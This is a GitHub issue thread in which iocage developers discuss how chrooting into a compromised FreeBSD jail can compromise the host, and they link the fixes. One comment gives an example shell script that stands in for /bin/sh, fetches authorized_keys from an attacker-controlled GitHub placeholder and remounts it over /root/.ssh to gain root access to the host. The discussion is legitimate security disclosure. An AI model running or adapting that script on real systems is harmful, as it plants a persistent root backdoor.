### ISSUE TITLE
iocage chroot is a security bug

### ISSUE THREAD

**Issue by pjd** [iocage/iocage#535]
Version 0.9.10 2017/12/22

Chrooting to a jail is not safe. If the jail is compromised it is easly to escape from jail this way. It is enough for an attacker to replace shell or libc inside the jail to load, eg. a kernel module. Once I chroot to jail the kernel module will be loaded and a backdoor can be easly installed in the main system. One should never execute anything from jail's file systems with the main system privileges.

This command could be replaced with doing 'jail /iocage/jails/hostname/root hostname /bin/tcsh'.

**Comment by kitten77** [comment]
asked a friend of mine on this, and there is a teoretical chance that someone could compromise the host both with using the jexec and jail command. He recommend no direct path from host to jail, rather have ssh connection to the jail, real question is it worth putting in the effort. 
Adding a default admin account to the jail with ssh keys and a way to change out the ssh key is the only real secure way to contact a jailed enviroment, I have codes that creates jails and add ssh keys to it so that i dont go from host -> jail rather client -> jail. My suggestion would be that iocage adds its own admin user and manage the jails from that admin over ssh, and not trust any of the built in ways to contact a jailed enviroment. 
At least then you know there is no teoretical chance in hell that someone could modify something on the jail to gain control over the host

**Comment by zachfi** [comment]
@pjd Can you point out places in the code where we chroot?  Also, jails can't load kernel modules to my knowledge, so a libc update wouldn't have the impact you're mentioning.  If you have a PoC, we should information security@freebsd.org I suspect.

@kitten77 How would using SSH help in this case?  If you mean to say that `eval $(jexec 1 backdoor)` is somehow different than `eval $(ssh localjail backdoor)`, I'm missing how using ssh helps.

I hope this project never attempts to manage users or ssh configurations.

**Comment by gronke** [comment]
Seems we're talking about different scenarios. @pjd has a valid point, chroot usage in iocage *is* a security issue. As soon as a jail was compromised, chrooting into it may compromise the host as well.

> The chroot utility changes its current and root directories to the supplied directory newroot and then exec's command, if supplied, or an interactive copy of the user's login shell.

Let's keep in mind that iocage is supposed to run as root and that every file within the jails root path is in control of an attacker (in case of a basejail that's not fully true, but there are enough ways to escalate, so that we can skip them in favor of simplicity). An attacker would rename `/bin/sh` to `/bin/.sh` and put this script in its initial place for example:

```
#!/bin/.sh
POOL=$(zpool list -o name -H | head -n1)
zfs create -o mountpoint=/evil $POOL/evil
fetch -o /evil/authorized_keys https://github.com/<ATTACKER>.keys
zfs umunt zroot/evil
zfs set mountpoint=/root/.ssh
/bin/.sh "$@"
```

The next time the host mounts the dataset (on reboot), the attacker is in control of the authorized_keys for the root user.

@kitten77 I am unaware of any method to escalate commands run by jexec. Exposing another service in every jail is another security risk that is introduced. I agree to @xaque208 that every such finding should be reported to security@freebsd.org.

> Can you point out places in the code where we chroot?

@xaque208 chroot is used by the chroot CLI command of course as well as jail upgrades:

https://github.com/iocage/iocage/blob/5a3a2c1ec8b0547ef53ffe805a3414ed316df26f/iocage/lib/ioc_upgrade.py#L223-L226

The code snipped executes a file that is not writable from within a basejail, but it interfaces with a lot other resources that are writable for root users in jails.

@skarekrow think that "safety" is not the right word here 😼:

https://github.com/iocage/iocage/blob/1d23d7feea2b40e6a927569a04c9c6e38f32bb8a/iocage/lib/iocage.py#L388-L398

**Comment by gronke** [comment]
I suggest running Jail and Release upgrades in a temporary jail as seen here:

1. https://github.com/iocage/libiocage/blob/ea759ea4e52a9f59f738c3f8c7083ff25917d596/iocage/lib/ResourceUpdater.py#L315-L319
2. https://github.com/iocage/libiocage/blob/ea759ea4e52a9f59f738c3f8c7083ff25917d596/iocage/lib/ResourceUpdater.py#L342-L346

**Comment by kitten77** [comment]
@gronke there is a slight chance that jail_attach() could be altered so that you gain access over the host, but as i said it is a teoretical risk that i haven't seen been done. 
The idea by using ssh instead of jail/jexec is that ssh has builtin protection so that one can't go from server to client, it should make a more secure route to a jail. It would also open for the possibilty to remote admin a jail, when thinking of the latest thick jail implementations. Where one could zfs send the whole jail out of the original host, would makes sense to be able to manage that host on a remote system. 
Wheter or not this is something you should or shouldnt not consider would be entirely up to you, I am only mentioning it to you. I would consider using ssh rather than jexec and jail a huge advantage for iocage over other jail managment, we live in a world that is pointing more and more towards remote administration of host. And the less we login to the main host the better

**Comment by zachfi** [comment]
Thank you @gronke, that makes sense.  I didn't realize we were chrooting at all.

**Comment by reelsense** [comment]
Is this complete? 

https://github.com/iocage/iocage/pull/545

https://github.com/iocage/iocage/pull/542

**Comment by skarekrow** [comment]
Yes it is! Thanks @reelsense for noticing
